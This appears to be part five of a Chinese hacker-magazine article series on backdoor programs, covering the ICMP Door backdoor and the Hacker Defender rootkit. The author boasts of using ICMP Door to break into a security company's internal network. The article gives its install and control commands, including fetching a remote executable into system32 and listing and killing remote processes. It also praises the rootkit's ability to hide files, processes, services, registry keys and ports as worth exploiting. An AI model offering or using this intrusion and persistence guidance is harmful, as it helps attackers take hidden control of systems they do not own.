后门程序知识完全解析(5)

　　4、C/S后门

　　传统的木马程序常常使用C/S构架，这样的构架很方便控制，也在一定程度上避免了“万能密码”的情况出现，对后门私有化有一定的贡献，这方面分类比较模糊，很多后门可以归结到此类中，比如较巧妙的就是ICMP Door了

　　ICMP Door

　　类型：系统后门

　　使用范围：win2000/xp/2003
　　隐蔽程度：★★★★★
　　使用难度：★★★☆☆
　　危害程度：★★★★☆
　　查杀难度：★★★★★

　　这个后门利用ICMP通道进行通信，所以不开任何端口，只是利用系统本身的ICMP包进行控制安装成系统服务后，开机自动运行，可以穿透很多防火墙——很明显可以看出它的最大特点：不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比，它的控制方式是很特殊的，连80端口都不用开放，不得不佩服务程序编制都在这方面独特的思维角度和眼光!

　　运用举例

　　这个后门其实用途最广的地方在于突破网关后对内网计算机的控制，因为很多机密数据都是放在内网计算机上的，而控制内网计算机并不是我们想到位的商业网络进行入侵检测，它的网络内部并不像我们常见的内网那样非常容易入侵和控制，因为该公司本身涉及到一些网络安全的服务，所以内网个人计算机的防护是很到位的，在尝试过很多后门后，最后ICMP Door帮我实现了成功的渗透内网!由此笔者开始爱上这个后门。

　　首先使用icmpsrv.exe -install参数进行后门的安装，再使用icmpsend.exe IP进行控制，可以用：[http://xxx.xxx.xxx/admin.exe -hkfx.exe]方式下载文件，保存在[url=file://\\system32\]\\system32\[/url]目录下，文件名为hkfx.exe，程序名前的“-”不能省去，使用[pslist]还可以列出远程主机的进程名称和pid，再使用[pskill id]就可以杀进程了，同样，输入普通cmd命令，则远程主机也就执行了相关的命令。

　　这个后门是采用的c/s构架，必须要使用icmpsend才能激活服务器，但是他也有自己的先天不足：后门依靠ICMP进行通讯，现在的网络，经过冲击波的洗礼后，很少有服务器还接受ICMP包了，很多都屏蔽掉了它，所以用它来控制服务器不是一个好办法，这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧?!

　　5.root kit

　　如果说上面的后门程序都各有千秋、各有所长的话，它们和经典的root kit 一比简直就是小巫见大巫了，那究竟什么样是root kit呢?

　　root kit出现于20世纪90年代初，在1994年2月的一篇安全咨询报告中首先使用了root kit这个名词。从出现至今，root kit 的技术发展非常迅速，应用越来越广泛，检测难度也越来越大。其中钍对SunOS和Linux两种操作系统的root kit最多。

　　很多人有一个误解，他们认为root kit 是用作获得系统root访问权限的工具。实际上，root kit是攻击都用来隐蔽自己的踪迹和保留root访问权限的工具。通常，攻击者通过远程攻击获得root访问权限，进入系统后，攻击者会在侵入的主机中安装root kit，然后他将经常通过root kit的后门检查系统是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过root kit的嗅探器获得其他系统的用户和密码之后，攻击者就会利用这些信息侵入其他系统。

　　从*nix系统上迁移到windows系统下的root kit完全沿袭了这些“可怕”的功能!现在网络上常见的root kit 是内核级后门软件，用户可以通过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘窨。程序同时也在内存中伪装它所做的改动，并且隐身地控制被隐藏进程。程序安装隐藏后门，注册隐藏系统服务并且安装系统驱动。该后门技术允许植入reDirector，是非常难以查杀的一个东东，让很多网络管员非常头疼!

　　hacker defender

　　类型：系统后门

　　使用范围：win200/xp/2003
　　隐蔽程度：★★★★★
　　使用难度：★★★★★
　　危害程度：★★★★★
　　查杀难度：★★★★★(呵呵，全部五星，因为它太“霸道”了)

　　现在最新版本的hxdf是1.0.0，它是从国外传过来的一个程序，包含两个关键程序，里面的配置文件ini非常复杂，相信新手使用也是很困难的主要包括：[Hidden Table]，[Root Processes]，[HiddenServices]，[Hidden RegKeys]，[Hidden RegValues]，[Startup Run]，[Free Space],[Hidden pORTS]，[Settings]。对功能就是隐藏文件(目录)、隐藏进程、隐蔽服务、隐藏注册键、隐藏注册表键值、启动程序、增加磁盘剩余空间、隐藏端口、后门设置，具体配置我们就不具体讲解了，本期文章有详细的介绍，我们说说它的特点(纯粹个人观点和经验偏激的地方请大家海涵)：

　　(1)可以实现正常系统TCP端口的通讯，比如80等，这个功能在高级后门并不鲜见。

　　(2)能得到简单的系统SHELL，对入侵的老手来说这就够了，多余的功能反而是累赘。

　　(3)隐藏端口，如果你非要使用TCP的某一个非常规端口通讯，那使用这个功能吧，放心，别人发现不了。

　　(4)隐藏后门的所有可找到东西!这个只能用一个字来形容：牛!比如隐藏文件、服务、注册表键等功能，虽然我们说起来是一句话，想念识货的朋友应该能发现这中间NB的地方!

　　(5)史上最经典后门思维：配合其他扩展型后门使用，效果好得出乎你的意料!(这是后面的内容，我们马上讲到)。

　　抛开其他不讲，系统中安装了这样的root kit，你通过普通的查杀途径根本检测不到这个程序这点就非常值得我们利用了!试想：一个在你服务器上运行的后门，你连看都看不到它，别说查杀了!

　　注：由于此后门危害太大，所以编辑特别在此掐掉作者一段篇幅，喜欢研究后门程序的朋友可以自己去研究，不过千万注意不要误运行了程序，查杀和清除是非常麻烦的事!直接重新安装系统吧!